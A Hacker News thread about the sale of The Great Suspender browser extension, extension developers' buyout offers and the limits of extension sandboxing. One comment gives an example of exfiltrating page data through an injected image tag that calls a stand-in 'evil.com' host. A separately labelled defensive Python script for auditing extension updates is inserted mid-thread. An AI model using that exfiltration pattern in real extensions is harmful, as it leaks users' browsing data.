[HN Gopher] I no longer trust The Great Suspender
___________________________________________________________________
I no longer trust The Great Suspender

Author : davidfstr
Score  : 758 points
Date   : 2021-01-20 14:01 UTC (8 hours ago)

web link (dafoster.net)
w3m dump (dafoster.net)

| tra3 wrote:
| A reddit link, from the blog post [0] has all the details for those who don't use chrome.
|
| TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.
|
| Did I miss anything?
|
| [0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...
| peanut_worm wrote:
| Why do people keep 100s of tabs open at a time? I get irritated if I have more than 8 open.
| eznzt wrote:
| Because they have not found the bookmarks feature yet.
| ortusdux wrote:
| When I have 100 tabs open, 90 of them are one-time-use pages. I need to compile bits of information from each page, and then I never need those pages again. Why would I use bookmarks?
|
| For example, last week I was shopping for a very specific, very expensive ceramic thrust bearing. I had 20+ pages open from 10+ suppliers and documentation sources. I needed those open all week while we decided on which one to buy. This was a minor background task, so I also had 60 other tabs open for my normal work flow.
|
| Just because people use a tool differently than you doesn't make them wrong.
| gmiller123456 wrote:
| It'd be great if someone invented a method of working with bookmarks that worked as easily and seamlessly as tabs.
|
| Back in the days of social bookmarks (like del.icio.us) pretty much everyone had a "toread" folder. The main problem is that you have to remember to delete them after reading them. That's not really a problem for good articles you remember reading, but the crap articles you don't remember, or quit reading, are easy to forget to delete from the bookmarks. So, you end up reading the same crap articles several times. With a tab, you close the window and you're done. With bookmarks, you have to close the window, go through your bookmarks, find the one that was crap that you have already forgotten and delete it.
|
| There are several other advantages to tabs too:
|
| Like the fact that they're naturally organized by window based on the task you're doing.
|
| You'll see them more often, and thus be reminded more often.
|
| They save context, like forwards and back history, and information you may have typed in, or a UI you may have manipulated.
| edeion wrote:
| That brings me to the problem with links as well as with e-books: you don't usually see them. When you have an open tab, you see it all day long until you get rid of it. When you have a printed book, you bump into it on a daily basis (unless you hide it in more books).
| hungryforcodes wrote:
| Also bookmarks don't save page context. If I'm doing something -- even something simple like scrolling down a page -- and get interrupted, it's just easier to leave it open.
| superkuh wrote:
| Yep. Tab history is important. How I got to some page is almost as important as the page itself.
|
| I've been using large tab sessions ever since Opera 5 in the early 2000s. Back then I'd have 20-50 tabs or so. These days I have sessions of 500 active tabs and 500 suspended. It's great. I have full text tab search, and since my sessions last years, I know the general location of all important tabs. Also, since I use a single process browser and NoScript, all those 500+ tabs take under 3 GB of ram.
|
| It's a matter of taste, but it's no new trend. Tabs, and tab users, have been around for 20 years now.
| jrockway wrote:
| https://xkcd.com/1172/
| sixothree wrote:
| Why do people not understand why I have 100s of tabs open? I get irritated when asked this question.
| nousermane wrote:
| Why indeed. Is that because bookmarks are too clumsy to use, and don't save your scroll position and other user input?
| redwall_hp wrote:
| Any time I'm working on something, I inevitably end up with 20-30 tabs with different things I'm referencing. Especially documentation. I think I have around 6-8 open when I'm not doing anything, since I pin some web apps (e.g. Facebook Messenger) or dashboards.
|
| It's also the best way to browse image galleries: middle click everything into new tabs, navigate them with the keyboard, and close them as you go. Beats clunky JavaScript lightboxes.
| blinding-streak wrote:
| Tabs are my lazy man's to-do list. Leaving them open saves all the context I need. Closing them means I have to spend effort to get them back.
| ortusdux wrote:
| Try the extension 'Session Buddy'. You can view all open tabs and windows, group them as needed, and then save, close, and reopen sessions and groups.
|
| I routinely research several related topics for a project, and I will need 10-30 tabs per topic open at once. Surprisingly, chrome manages to handle 100+ tabs on my system without issue.
| angelbar wrote:
| Please don't have more than 8 tabs open... problem solved.
|
| Other persons have other thresholds... and use cases.
|
| Some user support needs many searches that will help if documented later... if I bookmark all of them I will never do that.
| rbanffy wrote:
| I multitask. A lot. It's my job.
|
| You should see my desktop
| dbbk wrote:
| I'm a software developer and am always hovering around this mark. It's usually from digging through documentation, having multiple tabs with different areas of the app you're working on open, productivity tabs like Slack and Gmail, then personal tabs like Reddit and YouTube.
| fancy_pantser wrote:
| As the developer of a pretty popular "utility" browser extension, I've been shocked by the volume of email I get every week about it.
|
| On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".
|
| Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).
|
|     We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?
|
|     Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.
|
|     As a kind reminder, we are [redacted] -- a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans. Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
|
| Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.
| teachtyler wrote:
| Is this any different than Railway Programming? Or is this more specifically applicable to high order components?
|
| https://fsharpforfunandprofit.com/rop/
| LockAndLol wrote:
| > Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased.
|
| Do they ask you to do that for free or is there a monetary amount they tack on?
| reaperducer wrote:
| I have two thoughts about this.
|
| First, respond to every inquiry by telling them the price is USD$70,000,000.00. And stick to that price. Many of these sleazy companies get their leads from the same "lead generators," who will eventually take you off their lists because they know your terms are unreasonable. It doesn't work for everyone, but when I did it to spammers trying to buy my mailing list, it significantly reduced the volume of inquiries.
|
| Second, put a page on your web site listing all of the offending companies, with links to the letter you received.
|
| Apr 1, 2021 - Company X promised $3-5k/month if I alter your search results. Link.
|
| Apr 3, 2021 - Company Y promised $1-5k/month if I promote their product on other people's web pages. Link.
|
| A lot of people on HN will claim "O, noes! Lawyers! Libel!" I wouldn't worry about it. These people don't have the money for lawyers, are usually in geographies without legal systems, and don't want their names and other information exposed in a public legal filing. Plus, all you're doing is stating facts.
| hinkley wrote:
| > by telling them the price is USD$70,000,000.00
|
| There's a W C Fields joke that ends, "Madame, we've already established what sort of woman you are, now we're just haggling over price."
| bluGill wrote:
| Every time they make a lower offer counter with a higher price. They will soon learn what kind of person they are dealing with.
|
| If they actually do come up with $120,000,000 - well, at that point nobody will be surprised that you cashed out. They might be mad, but they won't blame you.
| AnIdiotOnTheNet wrote:
| Case in point: Notch once said that his price for selling out Minecraft was $2B. When Microsoft eventually said "sounds fair" and gave it to him very few people found it easy to be mad at him.
| cbhl wrote:
| I wonder what the calculus was on the Microsoft side of the equation.
|
| "It'd take more than 10-SWE-years to build a clone, so we should take his offer"?
| StellarTabi wrote:
| They rewrote anyways.
| mywittyname wrote:
| They are paying for the brand, not the product. Microsoft is ensuring that they have mindshare in the next generation of gamers. That's critically important to maintaining their ongoing success in the gaming sector.
|
| Similar to why Disney paid billions for Star Wars: the company was easily capable of replicating the product; the issue was replicating the brand. That brand has a proven track record of multi-generational appeal.
| ljm wrote:
| I think it's more than just the brand right? I can't speak for Disney and Star Wars because Star Wars was never my thing.
|
| These creative endeavours have a soul, or an essence, for want of a better term. You can replicate a game or a movie and it will feel utterly soulless compared to the original, even if you can't visibly notice a difference.
|
| You could reproduce Minecraft but even the most infinitesimal divergence from the original will make it feel fake. Maybe the controls have a different 'feel', or the way the scene is rendered feels a bit off. It's just not Minecraft any more. There are just so many quirks and details that will be lost in the translation, or even patched over if they're seen as bugs.
|
| It's no different if you ported a game from Unity to Unreal and then to CryEngine. I'm sure that with a blind comparison you would be able to 'feel' the difference.
|
| And the same for films. The way these things were created has a lot of influence over the end result.
|
| On the other hand, it's exactly what can make a remake or remaster so successful. The Resident Evil 2 and 3 remakes that followed Resi 7 were phenomenal! Not totally faithful to the originals, didn't try to be... they just took an older game and gave it a new life.
| citizenkeen wrote:
| I think you've just described a brand.
|
| People don't go to Starbucks because it's the best, they go to Starbucks because mocha frappuccinos in Lima and London taste exactly the same. Any divergence, even an infinitesimal one, makes the frap feel fake.
| brownbat wrote:
| Reminds me of the quests to recreate the secret recipe for Coca-Cola.
|
| The secret ingredient isn't orange peel, it's $4 billion a year in marketing.
| TedDoesntTalk wrote:
| You could recreate the brand and the product, and you still won't have millions of users playing it. They bought the user base, too.
| wpietri wrote:
| A brand is not just trade dress. It's a relationship between a company and the public. Recreating the brand means building those relationships.
| slongfield wrote:
| To be fair, people found plenty of other things to be mad at Notch about.
| drewwwwww wrote:
| that was not what people got mad at notch about
| newnamenewface wrote:
| People got mad at Notch for internet-age old reasons: expecting someone with high technical skills in one domain to have the right takes on social and political issues because they're now an internet social presence in addition to whatever creative work they've done. If people were realistic in their expectations of Notch, they'd never have been mad in the first place because they wouldn't have cared what inane ideas he spouted.
| grecy wrote:
| My buddy loves buying and selling stuff from the local newspaper. Whenever people give a low ball offer he looks them directly in the face and in a very confident manner says: "I'm accepting asking price or anything higher!"
|
| The looks on people's faces are incredible.
| madeofpalk wrote:
| I have no problem being "that sort of woman" for USD$70,000,000.00, over a browser extension.
| Dylan16807 wrote:
| There's a big difference between retirement money and day-job money, which applies both to this and the joke.
| mcjiggerlog wrote:
| I also have some extensions with users in the tens of thousands and can corroborate all of this. Out of curiosity I strung one "buyer" along to see how much they would offer and they quoted $0.20 per user. With the amount of money being thrown about, as sad as it is, it's no surprise that some devs end up selling out their users.
|
| In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust.
|
| Something needs to change. As long as extensions have such weak sandboxing along with such poor app review, Google/Mozilla etc will keep willingly shipping spyware unbeknownst to their users.
|
| At least some mechanism of creating and verifying reproducible builds would go a long way.
| Someone wrote:
| If you can make thousands a month on tens of thousands of users, that's (very much ballpark) $0.10 per user per month.
|
| Paying $0.20 per user to buy that seems extremely low.
|
| Also, on the sandboxing/app review of extensions, does anybody know how well Apple vets Safari extensions? (I guess that could be hard if the evil parts are time-triggered, certainly if the code also is obfuscated (possibly in the name of minification).)
| SamBam wrote:
| Who said they were earning thousands a month for their extension?
| wffurr wrote:
| If the malware seller can make $0.10 / user / month, then paying the extension developer a one-time fee of $0.20 * users is only three months to pay back. Thus considered a low price for the extension developer but still attractive to the extension developer who likely earns $0 / user from their extension.
| koheripbal wrote:
| The only extensions I have are privacy extensions. Do people on here really install a bunch of random 3rd party extensions?
| Scoundreller wrote:
| Privacy extensions can be crap too. Cutting off web-based analytics makes the telemetry from those users much _more_ valuable.
|
| Ghostery anyone?
|
| https://www.reddit.com/r/privacy/comments/59wiln/is_ghostery...
| marcus_holmes wrote:
| probably not on here no. But out there... definitely yes.
| rsync wrote:
| "In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust."
|
| I completely agree. There are a number of features I would really like to use in Firefox that are available only as extensions and I continue to resist installing them.
|
| In fact, the only extension I use is uBlock origin - which is based on a fairly rich social and community history behind that project and its author ...
| TedDoesntTalk wrote:
| Stick to the Firefox Recommended Addons list. Those are the only ones which are code reviewed by real people.
|
| And uBlock Origin is in that list.
| marcus_holmes wrote:
| Also, a business model for extensions would be good - even if it's just an official "tip box" that enthusiastic users can pay into
| milankragujevic wrote:
| Is this Luminati? [0] Because this sounds so much like Luminati ("Hola").
|
| [0] https://luminati.io/
| nitrogen wrote:
| Do extensions require any permissions to make requests? It seems like a strict sandbox that prevents data from flowing out of a page via an extension would help, if the extension is something like a JSON renderer.
| londons_explore wrote:
| Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.
|
| Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.
| angry_octet wrote:
| Couldn't CSP be used to limit which paths were valid URLs?
|
| There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.
| gruez wrote:
| extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.
| angry_octet wrote:
| Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.
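As an added example (not code from this thread or from The Great Suspender), this is the kind of check the reproducible-build remark and the permissions question above point at: pin the file hashes and the declared permissions of an unpacked extension, then diff a later version against that baseline so a quiet update that adds a tracking script, a sensitive API permission or all-hosts access is visible before it is allowed to run. The two snapshots, their version numbers and file contents are constructed for the example.

```python
"""Spot silent changes between two snapshots of an unpacked browser extension.

Added example; not code from the HN thread or from The Great Suspender project.
A snapshot is a dict {relative path: file bytes}, so the constructed manifests
at the bottom stand in for a real extension directory and the script runs offline.
"""
import hashlib
import json

# Match patterns that grant access to every page (Chrome match-pattern syntax).
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# API permissions that deserve a second look when they show up in an update.
SENSITIVE_PERMISSIONS = {
    "webRequest", "webRequestBlocking", "declarativeNetRequest", "cookies",
    "history", "management", "nativeMessaging", "scripting", "debugger",
}


def file_digests(files):
    """SHA-256 of every file keyed by path: the baseline to pin and compare."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def host_access(manifest):
    """Every host match pattern the extension asks for. MV2 lists URL patterns
    under "permissions", MV3 under "host_permissions"; content scripts add
    their own "matches"."""
    hosts = {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    hosts.update(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        hosts.update(script.get("matches", []))
    return hosts


def api_permissions(manifest):
    """Named API permissions only; host patterns are reported separately."""
    return set(manifest.get("permissions", [])) - host_access(manifest)


def is_broad(pattern):
    """True when a match pattern covers every host on one or all schemes."""
    return pattern in BROAD_HOST_PATTERNS or pattern.startswith("*://*/")


def audit(old_files, new_files):
    """Diff two snapshots: version, permissions, host access and file hashes.
    Returns a dict with the raw differences plus human-readable findings."""
    old_m = json.loads(old_files["manifest.json"])
    new_m = json.loads(new_files["manifest.json"])
    old_d, new_d = file_digests(old_files), file_digests(new_files)

    report = {
        "version": (old_m.get("version"), new_m.get("version")),
        "added_permissions": sorted(api_permissions(new_m) - api_permissions(old_m)),
        "removed_permissions": sorted(api_permissions(old_m) - api_permissions(new_m)),
        "added_hosts": sorted(host_access(new_m) - host_access(old_m)),
        "broad_host_access": any(is_broad(h) for h in host_access(new_m)),
        "added_files": sorted(set(new_d) - set(old_d)),
        "removed_files": sorted(set(old_d) - set(new_d)),
        "changed_files": sorted(p for p in old_d if p in new_d and old_d[p] != new_d[p]),
        "findings": [],
    }
    findings = report["findings"]
    old_v, new_v = report["version"]
    if old_v != new_v:
        findings.append(f"version changed {old_v} -> {new_v}")
    for perm in report["added_permissions"]:
        level = "SENSITIVE" if perm in SENSITIVE_PERMISSIONS else "info"
        findings.append(f"{level}: new API permission {perm}")
    for host in report["added_hosts"]:
        level = "SENSITIVE" if is_broad(host) else "info"
        findings.append(f"{level}: new host access {host}")
    for path in report["added_files"]:
        findings.append(f"new file {path}")
    for path in report["changed_files"]:
        findings.append(f"modified file {path}")
    return report


# Constructed snapshots of a tab-suspending extension before and after an update
# that adds an "analytics" script plus all-hosts access. Name, version numbers
# and file contents are made up for this example, not taken from any real extension.
OLD_SNAPSHOT = {
    "manifest.json": json.dumps({
        "manifest_version": 2, "name": "Example Suspender", "version": "7.1.6",
        "permissions": ["tabs", "storage"],
        "background": {"scripts": ["background.js"]},
    }).encode(),
    "background.js": b"chrome.tabs.onUpdated.addListener(suspendIfIdle);\n",
}
NEW_SNAPSHOT = {
    "manifest.json": json.dumps({
        "manifest_version": 2, "name": "Example Suspender", "version": "7.1.8",
        "permissions": ["tabs", "storage", "webRequest", "<all_urls>"],
        "background": {"scripts": ["background.js", "analytics.js"]},
    }).encode(),
    "background.js": b"chrome.tabs.onUpdated.addListener(suspendIfIdle);\nloadAnalytics();\n",
    "analytics.js": b"// constructed stand-in for a third-party tracking SDK\n",
}

if __name__ == "__main__":
    for line in audit(OLD_SNAPSHOT, NEW_SNAPSHOT)["findings"]:
        print(line)
```

Run against a real unpacked extension, the same `audit` call takes the directory contents read into a dict before and after an update; anything listed under SENSITIVE is the update that deserves reading before it is kept.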
| nitrogen wrote: | _Trying to sandbox an extension that can modify arbitrary | webpages in arbitrary ways is near futile._ | | Just don't let them create _script_ elements, or add any | URLs that don 't come from within the extension bundle | itself. Browsers already have to do a ton of bookkeeping to | track the origins of requests anyway. Doesn't seem hard, | you just have to be thorough. | londons_explore wrote: | There would be ways to trick the original page into | adding stuff for you. | | For example, you could patch some of the original script | of the page and wait for it to be run. | Dylan16807 wrote: | Restricting the extension to pre-baked URLs means it | takes several page loads to exfiltrate something, but | doesn't stop it. | MetalGuru wrote: | Crazy. Can I ask what extension this is? Wish I had the problem | of tens of thousands of new users wanting my product weekly :) | wlesieutre wrote: | Per an older comment, it's for pulling recipes off of awful | recipe blogs. Having stumbled into recipe blogs before, the | demand is understandable! | | https://chrome.google.com/webstore/detail/recipe- | filter/ahlc... | nonbirithm wrote: | I find it so ironic they'd buy out am extension | specifically designed to defeat SEO blogspam, just to | insert analytics based monetization instead. | Syntaf wrote: | Going one step further, I found AnyList[1] on this forum | awhile back and they also have a similar extension for | extracting recipes from awful blogging sites. | | The added benefit with AnyList is that you can import | ingredients directly into your grocery list from the | extension. Been a huge time saver for me | | [1] https://www.anylist.com/ | joshstrange wrote: | Paprika [0] can also parse any blog/recipe site and | import the recipe. Then you can add items from recipes to | your shopping list. I highly recommend this app, I've | converted many friends over to it. 
It's a much better | experience than trying to scroll through a blog post | while cooking. | | [0] https://www.paprikaapp.com/ | wpietri wrote: | Paprika is so good! There are a bunch of fit-and-finish | details that tell me that it's being made by people who | use it and who really care about listening to users. | beepboop43 wrote: | I'll add that I recently found how well Paprika handles | printing recipes you have in your library. I wanted to | print off a bunch of recipes to put in a binder and was | very happy with how clean and simply formatted each | recipe was, often with room to write notes on the paper. | My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | zerd wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | I thought that was the paid Cloud Sync feature was for. | Does it not work for that? | djrogers wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | My wife and I work around that by simply using the same | paprika account for cloud sync... | | Paprika is a huge time and sanity saver for me - it'd be | totally possible, but much harder for me to cook for big | events without it! | wlesieutre wrote: | I love Paprika, my one complaint about it is that you | have to be careful with the ingredients multiplier | feature. It only touches the number at the start, so "1 | large onion thinly sliced, about 2 cups" turns into "2 | large onion thinly sliced, about 2 cups." | | If you're not paying attention you can miss that it | really needs 4 cups. | joshstrange wrote: | Agreed, I've run into the same issue. 
I had hoped that | the numbers row they show above the keyboard (on mobile) | meant they were "special numbers" that would scale but | alas it only scales the first number AFAICT. | joshstrange wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | I normally abhor "social" features being tacked on when | they aren't useful but I'd pay for all the apps over | again for this feature. Thankfully the API is pretty | straightforward. This repo of mine [0] is super dated but | it was still working the last time I played with | Paprika's API. | | I've toyed around with setting up a little web app that | my friends can log-in with their paprika creds (I know, I | know, but I'd tell them to use a 1-off password for this) | so that they can use the web app either push or pull | recipes from each other. | | Thankfully you can send the full paprikarecipe file via | email and import it but it's a little clunky and things | like Discord (which my friends use to chat) doesn't like | file extensions over 12 characters (IIRC) so it just cuts | off the rest of the extension characters leaving you with | a file you can't open (without fixing the extension). I | have some initial work to setup an AWS SES address that | people can send recipes to that will then drop a preview | and link to download (not an attachment, it would be | hosted on S3) the recipe into a "recipes" Discord channel | we use but it's still a WIP. | | [0] https://github.com/joshstrange/paprika-api | [deleted] | hosteur wrote: | What is your extension called? | fancy_pantser wrote: | Recipe Filter: | https://chrome.google.com/webstore/detail/recipe- | filter/ahlc... | criddell wrote: | Why redact? I'm curious about who is doing this. | rsync wrote: | Agreed. These people need to be named and shamed. 
| boomboomsubban wrote: | It'd be annoying for the poster if they got mad, with an | unlikely but potential legal encounter involved, and 99.9% | of the community will never interact with the company. Even | the few that do would likely realize their scummy business | strategy immediately. Not worth it here. | jrochkind1 wrote: | With that kind of money being offered (assuming it is in the | ballpark of true)... I wonder how many popular free extensions | already have some of that junk in it and nobody's noticed. | Maybe many of them? I could see a lot of devs who started out | writing an extension as a non-paying hobby, having trouble | turning down the free money. | | I feel like this is another prong in the story about threats to | sustainability of open source done the way it used to/has been | done previously. | ryanlol wrote: | > assuming it is in the ballpark of true | | It is. It's very easy to generate big money with ad | replacement or proxies. | greenshackle2 wrote: | Some years ago I applied at a "data analytics" startup | founded by a locally famous founder. Their official purpose | was something something search something social media. Not | in the US, but he was featured on our local version of | Shark Tank at some point. | | During interview it became clear that their "product" was | actually bundled malware that replaced google's and other | ads in the browser. Evidently hot founder guy was using | this startup as cash cow for his other ventures. | | There was some noise in the press about it a couple years | later and founder guy defended himself saying he sold the | company and wasn't responsible, except it was already | malware when I interviewed and he was still owner so I know | it's bullshit. 
| JeanSebTr wrote: | He is well known for that in the local startup crowd ;) | tornato7 wrote: | And it's something I'm surprised Google hasn't done more to | stop considering these people are basically stealing their | revenue in their own browser | ugh123 wrote: | Ask Apple or Microsoft for a full time job to work on it =) | l3s2d wrote: | Did Apple compensate you for your work porting your extension? | fancy_pantser wrote: | No, but Apple and MS both consider the increased visibility | and growth in user count from being "featured" in their | marketplaces as a nice bonus for the developer. If I were a | business generating revenue from app subscriptions, I'd jump | all over it. | thwarted wrote: | "We can't pay you, but you'll get exposure" | sokoloff wrote: | Said every ad platform ever. | haukilup wrote: | For a couple projects and apps I worked on, exposure in | one of these stores would be worth a decent amount of | engineering effort. You can convert that exposure into | users, marketing "buzz", validation of the apps worth to | third parties, etc. | | This isn't universal, of course. But not all payment | comes in liquid form! | redwall_hp wrote: | And in Apple's case, you can pay $99/year for the | exposure... | [deleted] | noizejoy wrote: | > "We can't pay you, but you'll get exposure" | | ... said the venue owner to the musician. | | It's a frighteningly common invit^H^H^H^H^H^H | exploitation providing free labour to owners of gathering | places benefitting from that labour (like bars and | browsers and operating systems and social networks, etc). | kazinator wrote: | Why should the venue owner pay the musician? | | It's not an iron-clad given that the musician provides | value to a venue. | | Musicians who are confident they can bring business to a | venue negotiate with confidence and get paid. | | Those who play for free are ones who don't have that | confidence. | | What you accept is what you cost. That's the market rate. 
| | How about this argument. Say I have a restaurant. | Typically that means there is some landlord, and I pay | them utilities and rent in exchange for using the space. | Now some guitar-strumming, crooning ape wants to perform | in the same space. If he and I are to be considered part | of the same organization, we are on the same level of the | "org chart". We are sharing the space and doing our | thing. Why would I pay him anything? He should pay part | of the rent and utilities. Or, why not the other way | around? | | Let's reverse it. Suppose a musician has a venue where he | performs every night, and people come. Paying people. | Suppose I want sell hot-dogs and sandwiches there, and he | lets me do that. Why the fuck should he also pay me | anything? He would be right to ask me to pay some sort of | rent. | | Now if I give the hot dogs and sandwiches for free, so | that many more people come, and those people pay to get | into this music venue, then there is a case that I'm | increasing the business, and doing it out of my pocket. | Still, that is my problem; I shouldn't be doing such a | thing. Maybe I know what I'm doing! Or maybe I'm trying | out new product to see how people like it or whatever | (market research). | worik wrote: | " Why should the venue owner pay the musician?" | | Because a music venue without musicians insn't | sokoloff wrote: | But a dive bar is a still a dive bar and a casual | restaurant still a restaurant... | [deleted] | kazinator wrote: | A dive bar is still a place where people pay for drinks, | and not for music. | | The "open mic" is on Tuesday nights, because nobody goes | there then, so there is no harm to the business, and the | people who come to have open mic fun might buy drinks. | kazinator wrote: | No, it isn't a music venue without musicians. | | But the implied flow of money doesn't follow from that. | | Suppose I own an empty space with a little stage, a PA | sound system, and some 100 chairs. 
I put a down payment | on this place, paid for equipment and upgrades and have | to pay property taxes, utilities and mortgage. If nothing | happens there, I lose money out of my own pocket. I | intend for it to be a music venue. I meet the definition | of a music venue owner. | | Some musicians have contacted me and would like to have a | concert there. | | Should anyone pay anyone? Who should pay whom? | | How is this for logic: "A house isn't a home without a | family! If you want me to move into this house with my | wife and three kids to make it a home, you're gonna have | to pay me!" | bluGill wrote: | If you are generating revenue exposure can be very | useful. However if you don't already have a good business | model it just digs your hole deeper. Be very careful to | be sure which you are in. | EGreg wrote: | Thank you for sharing this, fancy_pantser. Are you the current | maintainer also, or the current developer? | | This is what capitalism looks like, folks. Someone "built it" | so they now privately "own it", no matter how big it gets. It's | not put into the hands of an organization. The profit motive is | quite strong, which is why someone can be "corrupted" by very | tempting messages like this. If you had a lake or a forest | privately owned by one or two people, and they had a lot of | debts, they could easily sell it to polluters and loggers. | | Some people scoff and say "socialism has been tried, it never | works." I admit that socialism simply trades one class of | elites (the capitalists with a lot of shares) for another (the | bureaucrats with a lot of political clout). BUT! I would like | to say that _socialism is not the only alternative_. The other | alternative is _decentralized systems with no private | ownership_. I 'm talking about science, open source software, | and so on. There can be a Merkle tree of version updates (e.g. 
| git version control) and each one can have various reputable | organizations (like Zagat for software) building their | reputation vetting it. Then, each community would run their own | app store (think Wordpress plugins) which would work with these | reputable organizations. There would be no heroes, no | celebrities, no tweets at 3 am to 5 million people, no pulling | from repos without peer review, no scientists instantly | believed after publishing on arxiv.org. | | Congratulations for building a popular extension, | fancy_pantser. You live in a world where it's really bad to | "criticize the profit", and where building it means you are | responsible for it no matter how big it gets, but then we are | all depending on your integrity and ability to rebuff life- | changing amounts of money to _not_ mine our data. We can pass | laws to punish people after the fact, or we can gradually | change our culture by rejecting "immediate gratification" of | updates that are not vetted, just as corporations have done | with bleeding edge vs stable Linux distros etc. Unfortunately, | the Web has made it so that anything can be updated at any | time, with no sysadmins or reviewers in the loop. It's a wonder | more malware isn't silently everywhere already. | throwawa66 wrote: | It's incredible how many downvotes you got for this without | any explanation. Your proposal sounds sensible and I agree | that we need to find a new system. It doesn't have to be the one | that you described but we should be open to change. | Capitalism the way it is leads us in the wrong direction and | socialism doesn't fare too much better in practice. We need | to redraw a plan for the 21st century. | Qwertious wrote: | If I were to guess, it's downvoted because when SKIMMED, | it sounds like an off-topic, far too long, and overly | political comment. | | It's a fair comment, but only if you actually read it.
| vinay_ys wrote: | https://news.ycombinator.com/newsguidelines.html might be | the reason why a lot of things here got downvoted. | Specifically: | | Please don't use Hacker News for political or ideological | battle. It tramples curiosity. | bjoli wrote: | Discouraging political discussions is a very political | thing in itself. The comment we are discussing might not | be a great example of encouraging curiosity, but being | the person that says "don't be so political" is | complacent and ignorant. We arrived at the current | situation due to political decisions and a political | process. | | I am not accusing you of being that person, nor anyone | else. I am just tired of people not seeing that upholding | the current situation is as political as criticizing it. | This discussion made me try to put it in words. | pksebben wrote: | This doesn't read like a battle, though. One could argue | that opinions that run counter to the generally accepted | norm are inherently good for curiosity. | EGreg wrote: | It is indeed incredible. As I said, you cannot "criticize | the profit" in the USA without losing social standing. | Capitalism is a national religion because people think the | only alternative is socialism (collective ownership of the | means of production - which btw isn't scary on small | levels) and the USA fought a cold war with the USSR for | decades. | | That's why there will be a third party in the USA that | unites disaffected progressives on the left with | disaffected paleoconservatives on the right. A lot of | people are fed up with the divisions. | | I welcome counterpoints and debate but as you can see -- | there are just silent downvotes instead. | isoskeles wrote: | You're probably being downvoted because even if your | critique might be thoughtful in some parts, it is also | quite snarky and smarmy at the beginning, and sounds like | it's posing an ideological battle.
Starting at the third | sentence, _"This is what capitalism looks like, folks."_ | In fact, you're still doing it, _"Capitalism is a | national religion..."_ | | Do you think people on HN want to engage with your | comments when you're saying they're foolishly clinging to | a religious belief? | | By the way, this was a decent point: _"[W]e are all | depending on your integrity and ability to rebuff life- | changing amounts of money to not mine our data."_ Maybe | this thread would be different if you stayed with points | like that instead of accusing people of harboring | religious beliefs that pull the wool over our eyes, | preventing us from seeing things your way. | filleduchaos wrote: | > Do you think people on HN want to engage with your | comments when you're saying they're foolishly clinging to | a religious belief? | | To be fair _you_ inserted "foolishly clinging", and are | now blaming them for something they did not actually | say. | | Capitalism _is_ highly akin to religion - they're not | the first and will not be the last to draw that | comparison, and plenty of words have already been written | on the topic. If your response to reading "capitalism is | a national religion" is to assume you're being insulted, | perhaps consider that the statement may be more true than | you think. | worik wrote: | Off topic, but.... | | There is unlikely to be a third party in the USA as the | system is designed to have two parties. | | There may be a third party that forces the Dems and GOP | to unite, back to two... | richardwhiuk wrote: | > decentralized systems with no private ownership | | aka anarchy. That turns out to be worse. | worik wrote: | What is your evidence? | | Makhnovist Ukraine, the Spanish Republic, and Zapatista | country now... | | All were/are quite different. Worse than what? | EGreg wrote: | Anarchy is simply absence of tall hierarchies. | | You can have each individual community choose what | OpenStreetMap tiles to use, what to censor etc.
